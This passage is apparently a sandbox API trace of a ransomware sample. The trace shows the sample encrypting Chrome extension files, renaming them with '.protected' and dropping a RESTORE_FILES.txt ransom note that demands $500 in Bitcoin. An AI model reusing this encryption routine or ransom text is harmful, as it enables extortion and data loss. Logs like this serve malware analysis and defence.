dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.631] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.631] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.631] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.631] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.632] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.632] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.632] CloseHandle (hObject=0x164) returned 1 [0078.632] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.632] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0078.632] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0078.632] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0078.632] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0078.632] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0078.632] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned 141 [0078.632] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0078.632] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0078.632] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*") returned 143 [0078.632] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.632] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.632] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.633] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.633] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.633] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.633] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\.") returned 143 [0078.633] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.633] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.633] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.633] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.633] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.633] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.633] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.633] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\..") returned 144 [0078.633] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.633] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.633] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.633] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.633] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.633] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.633] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.633] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.633] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.633] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.633] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.633] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.633] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.634] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.635] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.635] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.635] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.635] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0078.635] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.636] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0078.636] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.636] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.636] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.636] CloseHandle (hObject=0x168) returned 1 [0078.636] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.protected") returned 165 [0078.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.protected")) returned 1 [0078.637] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.637] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.637] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\RESTORE_FILES.txt") returned 159 [0078.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.637] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.637] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.638] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.638] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.638] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.638] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.638] CloseHandle (hObject=0x164) returned 1 [0078.638] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.638] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0078.638] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0078.638] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0078.638] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0078.638] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0078.639] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el") returned 141 [0078.639] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0078.639] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0078.639] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*") returned 143 [0078.639] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.639] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.639] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.639] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.639] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.639] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.639] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\.") returned 143 [0078.639] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.639] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.639] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.639] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.639] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.639] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.639] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.639] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\..") returned 144 [0078.639] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.639] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.639] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.639] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.639] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.640] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.640] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.640] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.640] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.640] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.640] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.640] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.640] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.640] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.640] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.640] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.640] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.640] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.640] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.640] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x112, lpOverlapped=0x0) returned 1 [0078.641] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.641] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x112, lpOverlapped=0x0) returned 1 [0078.642] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.642] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.642] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.642] CloseHandle (hObject=0x168) returned 1 [0078.642] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.protected") returned 165 [0078.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.protected")) returned 1 [0078.643] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.643] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.643] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\RESTORE_FILES.txt") returned 159 [0078.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.643] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your 